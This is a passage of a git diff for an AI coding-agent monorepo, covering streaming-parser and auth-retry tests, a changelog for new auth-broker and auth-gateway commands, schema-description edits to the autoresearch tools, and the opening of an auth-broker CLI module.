b("bc\r\n\r"), b("\n")]); + expect(events).toEqual([{ event: "x", data: "abc", raw: ["event: x", "data: abc"] }]); + }); + + it("handles a chunk that ends exactly on LF (no partial carried)", async () => { + const events = await collect([b("data: a\n"), b("data: b\n"), b("\n")]); + expect(events).toHaveLength(1); + expect(events[0]!.data).toBe("a\nb"); + }); + + it("flushes a trailing event with no terminating blank line", async () => { + // Stream closes without a final "\n\n". Parser must dispatch on flush. + const events = await collect([b("event: end\ndata: bye\n")]); + expect(events).toEqual([{ event: "end", data: "bye", raw: ["event: end", "data: bye"] }]); + }); + + it("flushes a trailing event with no terminating newline at all", async () => { + const events = await collect([b("event: end\ndata: bye")]); + expect(events).toEqual([{ event: "end", data: "bye", raw: ["event: end", "data: bye"] }]); + }); + + it("preserves UTF-8 multibyte characters via decoder fallback", async () => { + // Non-ASCII bytes (emoji, accented chars, CJK) must round-trip identically. + const events = await collect([b("data: caf\u00e9 \u2014 \u4f60\u597d \ud83d\ude00\n\n")]); + expect(events[0]!.data).toBe("café — 你好 😀"); + }); + + it("handles a UTF-8 multibyte sequence split across chunk boundary", async () => { + // The 4-byte emoji U+1F600 ("😀") = F0 9F 98 80. Split it between chunks. + const full = b("data: \ud83d\ude00\n\n"); + const split = full.indexOf(0xf0) + 2; + const events = await collect([full.subarray(0, split), full.subarray(split)]); + expect(events[0]!.data).toBe("😀"); + }); + + it("emits multiple events in stream order", async () => { + const events = await collect([b("event: a\ndata: 1\n\nevent: b\ndata: 2\n\nevent: c\ndata: 3\n\n")]); + expect(events.map(e => [e.event, e.data])).toEqual([ + ["a", "1"], + ["b", "2"], + ["c", "3"], + ]); + }); + + it("hands a fresh `raw` array to each observer call (no aliasing)", async () => { + const events = await collect([b("data: a\n\ndata: b\n\n")]); + expect(events).toHaveLength(2); + expect(events[0]!.raw).not.toBe(events[1]!.raw); + // Observer-side mutation of the first `raw` must not leak into the second. + events[0]!.raw.push("MUTATED"); + expect(events[1]!.raw).toEqual(["data: b"]); + }); + + it("treats `data:` with no value as empty string and merges further data lines", async () => { + const events = await collect([b("data:\ndata: x\n\n")]); + expect(events[0]!.data).toBe("\nx"); + }); + + it("returns the unwrapped fetch when observer is undefined", async () => { + const fetchImpl = async () => sseResponse([b("data: x\n\n")]); + const wrapped = wrapFetchForSseDebug(fetchImpl, undefined); + // Identity, not a wrapper: caller relies on this fast path. + expect(wrapped).toBe(fetchImpl as unknown as typeof wrapped); + }); + + it("passes through non-SSE responses untouched", async () => { + const events: RawSseEvent[] = []; + const fetchImpl = async () => + new Response(b("not sse"), { status: 200, headers: { "content-type": "text/plain" } }); + const wrapped = wrapFetchForSseDebug(fetchImpl, e => events.push(e)); + const response = await wrapped("https://example.test/plain"); + expect(await response.text()).toBe("not sse"); + expect(events).toHaveLength(0); + }); + + it("forwards the byte stream byte-identically to the consumer", async () => { + // Critical invariant: tee must not mutate or re-shape bytes for the + // downstream consumer. Use a payload with UTF-8 + CR-LF + heartbeats to + // stress the parser without corrupting forwarded bytes. + const payload = b(": heartbeat\r\nevent: msg\r\ndata: caf\u00e9 \u4f60\u597d\r\n\r\ndata: tail\n\n"); + // Chunk the input awkwardly so the TransformStream sees several chunks. + const chunks = [payload.subarray(0, 5), payload.subarray(5, 17), payload.subarray(17)]; + const fetchImpl = async () => sseResponse(chunks); + const wrapped = wrapFetchForSseDebug(fetchImpl, () => {}); + const response = await wrapped("https://example.test/stream"); + const forwarded = new Uint8Array(await response.arrayBuffer()); + expect(Array.from(forwarded)).toEqual(Array.from(payload)); + }); +}); diff --git a/packages/ai/test/stream-auth-retry.test.ts b/packages/ai/test/stream-auth-retry.test.ts new file mode 100644 index 000000000..939f27d15 --- /dev/null +++ b/packages/ai/test/stream-auth-retry.test.ts @@ -0,0 +1,141 @@ +import { afterEach, describe, expect, it } from "bun:test"; +import { registerCustomApi, unregisterCustomApis } from "@oh-my-pi/pi-ai"; +import { streamSimple } from "@oh-my-pi/pi-ai/stream"; +import type { Api, AssistantMessage, Context, Model, SimpleStreamOptions, Usage } from "@oh-my-pi/pi-ai/types"; +import { AssistantMessageEventStream } from "@oh-my-pi/pi-ai/utils/event-stream"; + +const SOURCE_ID = "stream-auth-retry-test"; +const API = "stream-auth-retry-test" as Api; + +function usage(): Usage { + return { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }; +} + +function assistant(content: string[] = []): AssistantMessage { + return { + role: "assistant", + content: content.map(text => ({ type: "text" as const, text })), + api: API, + provider: "test-provider", + model: "test-model", + usage: usage(), + stopReason: "stop", + timestamp: Date.now(), + }; +} + +function authError(): Error & { status: number } { + return Object.assign(new Error("401 authentication_error"), { status: 401 }); +} + +function model(): Model<Api> { + return { + id: "test-model", + name: "test-model", + api: API, + provider: "test-provider", + baseUrl: "mock://", + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1024, + maxTokens: 1024, + }; +} + +const context: Context = { + systemPrompt: [], + messages: [{ role: "user", content: "hello", timestamp: 1 }], +}; + +describe("streamSimple auth retry", () => { + afterEach(() => { + unregisterCustomApis(SOURCE_ID); + }); + + it("retries once with a fresh key when 401 happens before the first event", async () => { + const keys: Array<string | undefined> = []; + let authCalls = 0; + registerCustomApi( + API, + (_model: Model<Api>, _context: Context, options?: SimpleStreamOptions) => { + keys.push(options?.apiKey); + const stream = new AssistantMessageEventStream(); + queueMicrotask(() => { + if (keys.length === 1) { + stream.fail(authError()); + return; + } + const message = assistant(["ok"]); + stream.push({ type: "start", partial: message }); + stream.push({ type: "done", reason: "stop", message }); + }); + return stream; + }, + SOURCE_ID, + ); + + const stream = streamSimple(model(), context, { + apiKey: "old-key", + onAuthError: async (provider, oldKey, error) => { + authCalls += 1; + expect(provider).toBe("test-provider"); + expect(oldKey).toBe("old-key"); + expect((error as { status?: number }).status).toBe(401); + return "new-key"; + }, + }); + + for await (const _event of stream) { + // drain + } + + expect((await stream.result()).content).toEqual([{ type: "text", text: "ok" }]); + expect(keys).toEqual(["old-key", "new-key"]); + expect(authCalls).toBe(1); + }); + + it("does not retry after the first event has been emitted", async () => { + let authCalls = 0; + const failure = authError(); + registerCustomApi( + API, + () => { + const stream = new AssistantMessageEventStream(); + queueMicrotask(() => { + stream.push({ type: "start", partial: assistant() }); + stream.fail(failure); + }); + return stream; + }, + SOURCE_ID, + ); + + const stream = streamSimple(model(), context, { + apiKey: "old-key", + onAuthError: async () => { + authCalls += 1; + return "new-key"; + }, + }); + + let caught: unknown; + try { + for await (const _event of stream) { + // drain + } + } catch (error) { + caught = error; + } + + expect(caught).toBe(failure); + expect(authCalls).toBe(0); + }); +}); diff --git a/packages/ai/test/stream.test.ts b/packages/ai/test/stream.test.ts index 3a8d397a1..e7c6b9655 100644 --- a/packages/ai/test/stream.test.ts +++ b/packages/ai/test/stream.test.ts @@ -6,7 +6,6 @@ import { Effort } from "@oh-my-pi/pi-ai"; import { getBundledModel } from "@oh-my-pi/pi-ai/models"; import { complete, getEnvApiKey, stream } from "@oh-my-pi/pi-ai/stream"; import type { Api, Context, ImageContent, Model, OptionsForApi, Tool, ToolResultMessage } from "@oh-my-pi/pi-ai/types"; -import { StringEnum } from "@oh-my-pi/pi-ai/utils/schema"; import { $which } from "@oh-my-pi/pi-utils"; import * as z from "zod/v4"; import { e2eApiKey, resolveApiKey } from "./oauth"; @@ -34,14 +33,12 @@ function hasBedrockCredentials(): boolean { } // Calculator tool definition (same as examples) -// Note: Using StringEnum helper because Google's API doesn't support anyOf/const patterns -// that some schema authors emit for string unions. Google requires { type: "string", enum: [...] } format. const calculatorSchema = z.object({ a: z.number().describe("First number"), b: z.number().describe("Second number"), - operation: StringEnum(["add", "subtract", "multiply", "divide"], { - description: "The operation to perform. One of 'add', 'subtract', 'multiply', 'divide'.", - }), + operation: z + .enum(["add", "subtract", "multiply", "divide"]) + .describe("The operation to perform. One of 'add', 'subtract', 'multiply', 'divide'."), }); const calculatorTool: Tool<typeof calculatorSchema> = { diff --git a/packages/coding-agent/CHANGELOG.md b/packages/coding-agent/CHANGELOG.md index 639541d78..3c534355c 100644 --- a/packages/coding-agent/CHANGELOG.md +++ b/packages/coding-agent/CHANGELOG.md @@ -1,6 +1,46 @@ # Changelog ## [Unreleased] +### Breaking Changes + +- Renamed the embedded-documentation internal URL scheme from `pi://` to `omp://`. `OmpProtocolHandler` replaces `PiProtocolHandler`; update any external references accordingly. +- Removed the `StringEnum` re-export from `@oh-my-pi/pi-coding-agent`. Custom tools and extensions should use `z.enum([...])` directly via the injected `pi.zod`. +- Replaced the `eval` tool's LARK-grammar `input` string with a structured `cells` array. Each cell is `{ language: "py" | "js", code, title?, timeout?, reset? }`. Removed the implicit/sniffed language path, the `*** Cell` / `*** End` / `*** Abort` markers, and the per-cell `t:<duration>` unit suffixes — `timeout` is now seconds (1-600). + +### Added + +- Added `providers.<name>.transport: "pi-native"` to `models.yml`. When set, every model under that provider routes its streaming dispatch through the auth-gateway's `POST /v1/pi/stream` endpoint instead of the per-provider SDK. The provider's `baseUrl` must point at a compatible `omp auth-gateway` and `apiKey` must carry the gateway bearer. The slot's `models.json` still resolves locally for pricing/capabilities/thinking config; only the wire dispatch is redirected. Use case: containerized omp installs (robomp slots, swarm extension) where the slot must stay credential-free and a sidecar gateway holds the real provider tokens. Also surfaced as `transport` on `ProviderConfigInput` for extension-registered providers. +- Added optional backend push for the auto-QA grievance database (`dev.autoqaPush.enabled`, `dev.autoqaPush.endpoint`, `dev.autoqaPush.token`; env overrides `PI_AUTO_QA_PUSH`, `PI_AUTO_QA_PUSH_URL`, `PI_AUTO_QA_PUSH_TOKEN`). When enabled, every `report_tool_issue` call schedules a background flush that `POST`s pending rows to the configured endpoint and deletes them on HTTP 2xx. Each push carries a stable per-install UUID (`installId`) generated on first use and persisted at `~/.omp/install-id` via `getInstallId()` (new export from `@oh-my-pi/pi-utils`), so the receiver can dedup retries across host renames and `autoqa.db` wipes. Single-flight, 5s request timeout, 30s in-memory cooldown after failure, and a row-id watermark so rows inserted during an in-flight push survive and ship next time. Tool execution remains non-blocking and never throws. +- `ModelRegistry` now promotes `models.yml` `providers.<name>.apiKey` entries to `AuthStorage`'s new config-override tier (above OAuth, below `--api-key`). Pinning a bearer in `models.yml` was previously a no-op when the broker had an OAuth credential for the same provider — the OAuth access token won and got sent unmodified to whatever `baseUrl` you redirected to, which an auth-gateway in front of that endpoint rightly rejected with 401. The override is now honored, and is cleared/repopulated atomically on `models.yml` reload (`#reloadStaticModels` calls `clearConfigApiKeys` before re-parsing). Use case: route `anthropic` / `openai-codex` to `http://llm-gateway.internal:4000` with the gateway's own bearer. +- Added `omp auth-broker` subcommand for running and consuming a hosted credential vault. +- `serve [--bind=host:port]` — boots a local broker against the SQLite store at `$AGENT_DB_PATH`. +- `token [--regenerate]` — prints (and rotates) the bearer token stored at `~/.omp/auth-broker.token`. +- `login <provider> [--via=user@host] [--dry-run]` — drives the OAuth flow locally or via SSH `-L` tunnel into a remote broker (callback ports pinned per provider). +- `logout <provider>` — disables every credential for the given provider in the local SQLite store. +- `import <file|dir> [--provider=<id>] [--include-disabled] [--dry-run]` — imports CLIProxyAPI-style JSON credential dumps (`~/.cliproxy/auth/*.json`). When `OMP_AUTH_BROKER_URL` is configured, credentials are uploaded to the remote broker via `POST /v1/credential`; otherwise they go into the local SQLite store. JSON `type` is mapped to omp providers (`claude` → `anthropic`, `codex` → `openai-codex`, `gemini[-cli]` → `google-gemini-cli`, `antigravity` → `google-antigravity`); `--provider` overrides the mapping for unrecognized types. +- `status` — pings the configured remote broker (`OMP_AUTH_BROKER_URL`). +- Added remote credential vault support to `discoverAuthStorage`. Configure via env (`OMP_AUTH_BROKER_URL` / `OMP_AUTH_BROKER_TOKEN`) or by setting `auth.broker.url` and `auth.broker.token` in `~/.omp/agent/config.yml` (hidden from the settings UI; supports `!command` resolution). Falls back to `~/.omp/auth-broker.token` when no token is provided inline. Otherwise behavior is unchanged. +- Added `omp auth-broker migrate --from-local [--include-env] [--include-oauth] [--dry-run]` — uploads local SQLite credentials (and optionally env-var API keys) to the configured broker. Skips anything already on the broker via identity-key matching. OAuth is skipped by default (handled via `cliproxy` import). Idempotent on re-runs. +- Added `omp auth-gateway` subcommand for running a forward-proxy that hides access tokens from less-trusted clients: +- `serve [--bind=…]` — boots the gateway against the configured broker. Listens on `127.0.0.1:4000` by default. +- `token [--regenerate]` — manages the gateway bearer token at `~/.omp/auth-gateway.token` (separate from the broker bearer). +- `status` — verifies gateway config and authenticated broker readiness. +- One wire surface: `POST /v1/chat/completions` (OpenAI chat-completions), `POST /v1/messages` (Anthropic messages), `POST /v1/responses` (OpenAI Responses), `GET /v1/usage` (aggregated, 5-min per-credential cache), `GET /v1/models` (catalog). Model id in the request body selects which omp provider/model services it; the gateway translates wire format ↔ omp canonical `Context` and dispatches through `pi-ai` `streamSimple()`. Container deployments (robomp, etc.) get inference auth without ever holding access tokens or the broker bearer. + +### Changed + +- Changed TTSR `interruptMode` semantics so a non-interrupting decision on a tool-source match now folds the rule reminder into that specific tool's `toolResult` content instead of queuing a loop-wide deferred follow-up turn. Text/thinking matches keep the previous deferred-injection behavior. + +### Fixed + +- Fixed streaming API requests to recover from provider auth errors by invalidating stale credentials and retrying with a fresh key +- Fixed `auth-broker` migration, `auth-gateway` startup, and `discoverAuthStorage` to fail fast with a clear error when the broker snapshot endpoint returns a non-200 response +- Fixed `omp auth-broker migrate` to skip local placeholder `<authenticated>` API credentials (not real keys) when exporting to a remote broker +- Fixed `auth-gateway` token initialization to avoid clobbering an existing token when multiple processes initialize it concurrently +- Fixed `omp auth-gateway` request handling to reject unsupported OpenAI/Anthropic protocol controls with 400 instead of accepting and ignoring them, propagate upstream error/abort terminal states as failures, preserve Responses reasoning and completed text items, accept string/system Responses messages, and keep Anthropic tool-result ordering valid. +- Fixed gateway usage reporting to include cached-token totals for OpenAI Chat/Responses and to serve the last good cached report during transient upstream usage fetch failures. +- Fixed auth-gateway request cancellation for requests that are already aborted before dispatch. +- Fixed `/login` and `/logout` provider selector overflowing tall provider lists off-screen on small terminals. The selector now scrolls a 10-item window centered on the highlighted entry, shows a `(n/total)` indicator when windowed, and accepts PageUp/PageDown for faster navigation. ## [15.1.2] - 2026-05-15 ### Fixed diff --git a/packages/coding-agent/examples/custom-tools/README.md b/packages/coding-agent/examples/custom-tools/README.md index 0c88fb304..e0e0e12c3 100644 --- a/packages/coding-agent/examples/custom-tools/README.md +++ b/packages/coding-agent/examples/custom-tools/README.md @@ -47,7 +47,6 @@ See [docs/custom-tools.md](../../docs/custom-tools.md) for full documentation. **Factory pattern:** ```typescript -import { StringEnum } from "@oh-my-pi/pi-ai"; import { Text } from "@oh-my-pi/pi-tui"; import type { CustomToolFactory } from "@oh-my-pi/pi-coding-agent"; @@ -56,7 +55,7 @@ const factory: CustomToolFactory = (pi) => ({ label: "My Tool", description: "Tool description for LLM", parameters: pi.zod.object({ - action: StringEnum(["list", "add"] as const), + action: pi.zod.enum(["list", "add"]), }), // Called on session start/switch/branch/clear @@ -76,9 +75,6 @@ const factory: CustomToolFactory = (pi) => ({ export default factory; ``` - -**Legacy:** `parameters: pi.typebox.Type.Object({ ... })` still works; the injected `typebox` is a small Zod-backed shim, and schemas flow through the same Zod pipeline as `pi.zod` schemas. - **Custom rendering:** ```typescript @@ -97,17 +93,12 @@ renderResult(result, { expanded, isPartial }, theme) { }, ``` -**Use `StringEnum` for discriminated string tool args** (required for Google API compatibility): +**Use `z.enum` for discriminated string tool args:** ```typescript -import { StringEnum } from "@oh-my-pi/pi-ai"; - const { z } = pi.zod; -// Good — Google-safe enum wiring parameters: z.object({ - action: StringEnum(["list", "add"] as const), + action: z.enum(["list", "add"]), }); - -// Avoid raw union-of-literals patterns that don't degrade well for strict JSON Schema providers ``` diff --git a/packages/coding-agent/examples/extensions/README.md b/packages/coding-agent/examples/extensions/README.md index 747d33c9d..f0624d9e0 100644 --- a/packages/coding-agent/examples/extensions/README.md +++ b/packages/coding-agent/examples/extensions/README.md @@ -108,29 +108,16 @@ export default function (pi: ExtensionAPI) { }); } ``` - -**Legacy TypeBox-style schemas** (`pi.typebox`) remain available for older extensions and are backed by a tiny Zod-shim — prefer `pi.zod` directly for new code. - -```typescript -const { Type } = pi.typebox; -parameters: Type.Object({ name: Type.String() }); -``` - ## Key Patterns -**Use `StringEnum` for discriminated string tool args** (required for Google API compatibility): +**Use `z.enum` for discriminated string tool args:** ```typescript -import { StringEnum } from "@oh-my-pi/pi-ai"; - const { z } = pi.zod; -// Good — Google-safe enum wiring parameters: z.object({ - action: StringEnum(["list", "add"] as const), + action: z.enum(["list", "add"]), }); - -// Avoid raw union-of-literals patterns that don't degrade well for strict JSON Schema providers ``` **State persistence via details:** diff --git a/packages/coding-agent/examples/extensions/api-demo.ts b/packages/coding-agent/examples/extensions/api-demo.ts index 9883e6c59..aaf12084d 100644 --- a/packages/coding-agent/examples/extensions/api-demo.ts +++ b/packages/coding-agent/examples/extensions/api-demo.ts @@ -10,9 +10,6 @@ import type { ExtensionAPI } from "@oh-my-pi/pi-coding-agent"; export default function (pi: ExtensionAPI) { const { z } = pi.zod; - // Access shared schema helpers from package exports (e.g. StringEnum for Google-safe enums) - const { StringEnum } = pi.pi; - // Access the logger for debugging pi.logger.debug("API demo extension loaded"); @@ -22,10 +19,7 @@ export default function (pi: ExtensionAPI) { description: "Demonstrates ExtensionAPI capabilities: logger, zod, and pi module access", parameters: z.object({ message: z.string().describe("Test message"), - logLevel: StringEnum(["error", "warn", "debug"], { - description: "Log level to use", - default: "debug", - }), + logLevel: z.enum(["error", "warn", "debug"]).default("debug").describe("Log level to use"), }), async execute(_toolCallId, params, _onUpdate, ctx, _signal) { diff --git a/packages/coding-agent/package.json b/packages/coding-agent/package.json index e438be0fb..2abe9a206 100644 --- a/packages/coding-agent/package.json +++ b/packages/coding-agent/package.json @@ -539,7 +539,6 @@ "types": "./src/web/search/providers/*.ts", "import": "./src/web/search/providers/*.ts" }, - "./*.js": "./src/*.ts" } } diff --git a/packages/coding-agent/src/autoresearch/tools/init-experiment.ts b/packages/coding-agent/src/autoresearch/tools/init-experiment.ts index c1db6854c..55065d04d 100644 --- a/packages/coding-agent/src/autoresearch/tools/init-experiment.ts +++ b/packages/coding-agent/src/autoresearch/tools/init-experiment.ts @@ -17,42 +17,20 @@ export const DEFAULT_HARNESS_COMMAND = `bash ${HARNESS_FILENAME}`; const HARNESS_COMMIT_TITLE = "autoresearch: harness setup"; const initExperimentSchema = z.object({ - name: z.string().describe("Human-readable experiment name."), - goal: z.string().describe("Free-form description of what this session optimizes.").optional(), - primary_metric: z - .string() - .describe( - "Primary metric name shown in the dashboard. Match the `METRIC <name>=<value>` lines printed by the benchmark.", - ), - metric_unit: z.string().describe("Unit for the primary metric (e.g. ms, µs, mb). Empty when unitless.").optional(), + name: z.string().describe("experiment name"), + goal: z.string().describe("session goal").optional(), + primary_metric: z.string().describe("primary metric name"), + metric_unit: z.string().describe("metric unit (e.g. ms, µs, mb)").optional(), direction: z .enum(["lower", "higher"] as const) - .describe("Whether lower or higher values are better. Defaults to lower.") - .optional(), - secondary_metrics: z - .array(z.string()) - .describe("Names of secondary metrics tracked alongside the primary metric.") - .optional(), - scope_paths: z - .array(z.string()) - .describe( - "Files or directories the agent expects to modify. Used post-hoc to flag scope deviations on log_experiment; never used to block edits.", - ) - .optional(), - off_limits: z - .array(z.string()) - .describe( - "Paths the agent SHOULD NOT modify. Used post-hoc to flag scope deviations on log_experiment; never used to block edits.", - ) - .optional(), - constraints: z.array(z.string()).describe("Free-form constraints (e.g. 'no api break').").optional(), - max_iterations: z.number().describe("Soft cap on iterations per segment. Optional.").optional(), - new_segment: z - .boolean() - .describe( - "When true, bump to a new segment even when an active session exists. New baselines and best-metric reset.", - ) + .describe("better direction (default lower)") .optional(), + secondary_metrics: z.array(z.string()).describe("secondary metric names").optional(), + scope_paths: z.array(z.string()).describe("expected-to-modify paths").optional(), + off_limits: z.array(z.string()).describe("off-limits paths").optional(), + constraints: z.array(z.string()).describe("free-form constraints").optional(), + max_iterations: z.number().describe("soft iteration cap per segment").optional(), + new_segment: z.boolean().describe("bump to a new segment in existing session").optional(), }); interface InitExperimentDetails { diff --git a/packages/coding-agent/src/autoresearch/tools/log-experiment.ts b/packages/coding-agent/src/autoresearch/tools/log-experiment.ts index bb6ea635b..e0514bd43 100644 --- a/packages/coding-agent/src/autoresearch/tools/log-experiment.ts +++ b/packages/coding-agent/src/autoresearch/tools/log-experiment.ts @@ -37,35 +37,21 @@ import type { const EXPERIMENT_TOOL_NAMES = ["init_experiment", "run_experiment", "log_experiment", "update_notes"]; const logExperimentSchema = z.object({ - metric: z - .number() - .describe("Primary metric value for this run. May differ from the parsed value; deviation is recorded."), - status: z.enum(["keep", "discard", "crash", "checks_failed"] as const).describe("Outcome for this run."), - description: z.string().describe("Short description of the experiment."), - metrics: z.record(z.string(), z.number()).describe("Secondary metrics for this run.").optional(), - asi: z - .object({}) - .passthrough() - .describe("Free-form structured metadata captured for this run (hypothesis, learnings, etc.).") - .optional(), - commit: z - .string() - .describe("Override the commit hash recorded for this run. Defaults to the current HEAD.") - .optional(), - justification: z - .string() - .describe( - "Required when the run modifies paths outside scope or inside off-limits and you still want it kept. Free-form explanation.", - ) - .optional(), + metric: z.number().describe("primary metric value"), + status: z.enum(["keep", "discard", "crash", "checks_failed"] as const).describe("run outcome"), + description: z.string().describe("short run description"), + metrics: z.record(z.string(), z.number()).describe("secondary metrics").optional(), + asi: z.object({}).passthrough().describe("free-form structured metadata").optional(), + commit: z.string().describe("override recorded commit hash").optional(), + justification: z.string().describe("required when keeping a scope-deviating run").optional(), flag_runs: z .array( z.object({ - run_id: z.number().describe("Run id (#) of a previously logged run to flag as suspect."), - reason: z.string().describe("Why this earlier run is suspect (e.g. reward-hacked, broken metric)."), + run_id: z.number().describe("run id to flag"), + reason: z.string().describe("why this run is suspect"), }), ) - .describe("Mark earlier runs as flagged. Flagged runs are excluded from baseline and best-metric math.") + .describe("flag earlier runs as suspect") .optional(), }); diff --git a/packages/coding-agent/src/autoresearch/tools/run-experiment.ts b/packages/coding-agent/src/autoresearch/tools/run-experiment.ts index 59d06d69e..34a6f08c4 100644 --- a/packages/coding-agent/src/autoresearch/tools/run-experiment.ts +++ b/packages/coding-agent/src/autoresearch/tools/run-experiment.ts @@ -27,7 +27,7 @@ import type { AutoresearchToolFactoryOptions, RunDetails, RunExperimentProgressD import { DEFAULT_HARNESS_COMMAND } from "./init-experiment"; const runExperimentSchema = z.object({ - timeout_seconds: z.number().describe("Timeout in seconds. Defaults to 600.").optional(), + timeout_seconds: z.number().describe("timeout in seconds (default 600)").optional(), }); interface ProcessExecutionResult { diff --git a/packages/coding-agent/src/autoresearch/tools/update-notes.ts b/packages/coding-agent/src/autoresearch/tools/update-notes.ts index d5b378a96..90118040c 100644 --- a/packages/coding-agent/src/autoresearch/tools/update-notes.ts +++ b/packages/coding-agent/src/autoresearch/tools/update-notes.ts @@ -9,15 +9,8 @@ import { openAutoresearchStorageIfExists } from "../storage"; import type { AutoresearchToolFactoryOptions } from "../types"; const updateNotesSchema = z.object({ - body: z - .string() - .describe("Replacement markdown body for the active autoresearch session's notes (your durable playbook)."), - append_idea: z - .string() - .describe( - "When set, append this string as a new bullet under an Ideas section instead of replacing the body. `body` is ignored.", - ) - .optional(), + body: z.string().describe("replacement notes body"), + append_idea: z.string().describe("append as bullet under Ideas instead of replacing body").optional(), }); interface UpdateNotesDetails { diff --git a/packages/coding-agent/src/cli.ts b/packages/coding-agent/src/cli.ts index f672269c8..d9dd04c88 100755 --- a/packages/coding-agent/src/cli.ts +++ b/packages/coding-agent/src/cli.ts @@ -18,7 +18,7 @@ procmgr.scrubProcessEnv(); * CLI entry point — registers all commands explicitly and delegates to the * lightweight CLI runner from pi-utils. */ -import { type CommandEntry, run } from "@oh-my-pi/pi-utils/cli"; +import { type CliConfig, type CommandEntry, run } from "@oh-my-pi/pi-utils/cli"; if (Bun.semver.order(Bun.version, MIN_BUN_VERSION) < 0) { process.stderr.write( @@ -32,6 +32,8 @@ process.title = APP_NAME; const commands: CommandEntry[] = [ { name: "launch", load: () => import("./commands/launch").then(m => m.default) }, { name: "acp", load: () => import("./commands/acp").then(m => m.default) }, + { name: "auth-broker", load: () => import("./commands/auth-broker").then(m => m.default) }, + { name: "auth-gateway", load: () => import("./commands/auth-gateway").then(m => m.default) }, { name: "agents", load: () => import("./commands/agents").then(m => m.default) }, { name: "commit", load: () => import("./commands/commit").then(m => m.default) }, { name: "config", load: () => import("./commands/config").then(m => m.default) }, @@ -47,7 +49,7 @@ const commands: CommandEntry[] = [ { name: "search", load: () => import("./commands/web-search").then(m => m.default), aliases: ["q"] }, ]; -async function showHelp(config: import("@oh-my-pi/pi-utils/cli").CliConfig): Promise<void> { +async function showHelp(config: CliConfig): Promise<void> { const { renderRootHelp } = await import("@oh-my-pi/pi-utils/cli"); const { getExtraHelpText } = await import("./cli/args"); renderRootHelp(config); diff --git a/packages/coding-agent/src/cli/auth-broker-cli.ts b/packages/coding-agent/src/cli/auth-broker-cli.ts new file mode 100644 index 000000000..651d139b9 --- /dev/null +++ b/packages/coding-agent/src/cli/auth-broker-cli.ts @@ -0,0 +1,746 @@ +/** + * `omp auth-broker` command handlers. + * + * Sub-verbs: + * - `serve [--bind=…]` — boots the broker against the local SQLite store. + * - `token` / `token --regenerate` — manages the bearer token file. + * - `login <provider> [--via=user@host]` — logs into a provider locally, or + * via SSH tunnel into a remote broker host. + * - `import <file|dir>` — imports CLIProxyAPI-style JSON credentials into + * the local SQLite store (typical use: `import ~/.cliproxy/auth`). + * - `migrate --from-local [--include-env] [--include-oauth] [--dry-run]` — + * uploads local SQLite + env API keys to the broker, skipping anything + * the broker already has. + * - `status` — health-pings the configured remote broker. + */ +import * as crypto from "node:crypto"; +import * as fs from "node:fs/promises"; +import * as os from "node:os"; +import * as path from "node:path"; +import { + AuthBrokerClient, + type AuthCredential, + AuthStorage, + type CredentialDisabledEvent, + DEFAULT_AUTH_BROKER_BIND, + getEnvApiKey, + getOAuthProviders, + listProvidersWithEnvKey, + type OAuthCredential, + type OAuthProvider, + SqliteAuthCredentialStore, + startAuthBroker, +} from "@oh-my-pi/pi-ai"; +import { $which, APP_NAME, getAgentDbPath, getConfigRootDir, isEnoent, logger, VERSION } from "@oh-my-pi/pi-utils"; +import { $ } from "bun"; +import chalk from "chalk"; +import { resolveAuthBrokerConfig } from "../session/auth-broker-config"; + +export type AuthBrokerAction = "serve" | "token" | "login" | "logout" | "status" | "import" | "migrate"; + +export interface AuthBrokerCommandArgs { + action: AuthBrokerAction; + flags: { + json?: boolean; + bind?: string; + regenerate?: boolean; + via?: string; + provider?: string; + dryRun?: boolean; + /** `login`/`logout`: provider id. `import`: filesystem path. */ + source?: string; + /** `import`: keep credentials whose JSON had `disabled: true`. */ + includeDisabled?: boolean; + /** `migrate`: also upload local OAuth (default: api_key only, since OAuth is via cliproxy import). */ + includeOauth?: boolean; + /** `migrate`: also capture env-var API keys for providers not yet on broker. */ + includeEnv?: boolean; + /** `migrate`: required `--from-local` source. Reserved for future sources. */ + fromLocal?: boolean; + }; +} + +const ACTIONS: readonly AuthBrokerAction[] = ["serve", "token", "login", "logout", "import", "migrate", "status"]; + +/** Callback ports baked from the per-provider OAuth flow modules. */ +const CALLBACK_PORTS: Record<string, number> = { + anthropic: 54545, + "openai-codex": 1455, + "google-gemini-cli": 8085, + "google-antigravity": 51121, + "gitlab-duo": 8080, +}; + +function getTokenFilePath(): string { + return path.join(getConfigRootDir(), "auth-broker.token"); +} + +async function readToken(): Promise<string | null> { + try { + const raw = await Bun.file(getTokenFilePath()).text(); + const trimmed = raw.trim(); + return trimmed.length > 0 ? trimmed : null; + } catch (err) { + if (isEnoent(err)) return null; + throw err; + } +} + +async function writeToken(token: string): Promise<void> { + const file = getTokenFilePath(); + await fs.mkdir(path.dirname(file), { recursive: true, mode: 0o700 }); + await Bun.write(file, token); + try { + await fs.chmod(file, 0o600); + } catch { + // Best-effort (e.g. Windows). + } +} + +function generateToken(): string { + return crypto.randomBytes(32).toString("base64url"); +} + +async function ensureToken(): Promise<string> { + const existing = await readToken(); + if (existing) return existing; + const token = generateToken(); + await writeToken(token); + return token; +} + +async function runServe(flags: AuthBrokerCommandArgs["flags"]): Promise<void> { + // The broker is a long-running headless service: route structured logs to + // stdout so a process supervisor (pm2, journald, k8s) captures them, and + // skip the rotating ~/.omp/logs/ file the TUI default would have used. + logger.setTransports({ console: true, file: false }); + + const bind = flags.bind ?? DEFAULT_AUTH_BROKER_BIND; + const token = await ensureToken(); + const dbPath = getAgentDbPath(); + const store = await SqliteAuthCredentialStore.open(dbPath); + const storage = new AuthStorage(store); + await storage.reload(); + const handle = startAuthBroker({ + storage, + bind, + bearerTokens: [token], + version: VERSION, + }); + logger.info("auth-broker listening", { url: handle.url }); + logger.info("auth-broker bearer token loaded", { path: getTokenFilePath(), mode: "0600" }); + + const credentialDisabledUnsub = storage.onCredentialDisabled((event: CredentialDisabledEvent) => { + logger.warn("auth-broker credential disabled", { ...event }); + }); + + const shutdown = async (signal: NodeJS.Signals): Promise<void> => { + logger.info("auth-broker shutting down", { signal }); + credentialDisabledUnsub(); + await handle.close(); + storage.close(); + process.exit(0); + }; + process.once("SIGINT", () => void shutdown("SIGINT")); + process.once("SIGTERM", () => void shutdown("SIGTERM")); + + // Block forever; lifecycle is signal-driven. + await new Promise<never>(() => {}); +} + +async function runToken(flags: AuthBrokerCommandArgs["flags"]): 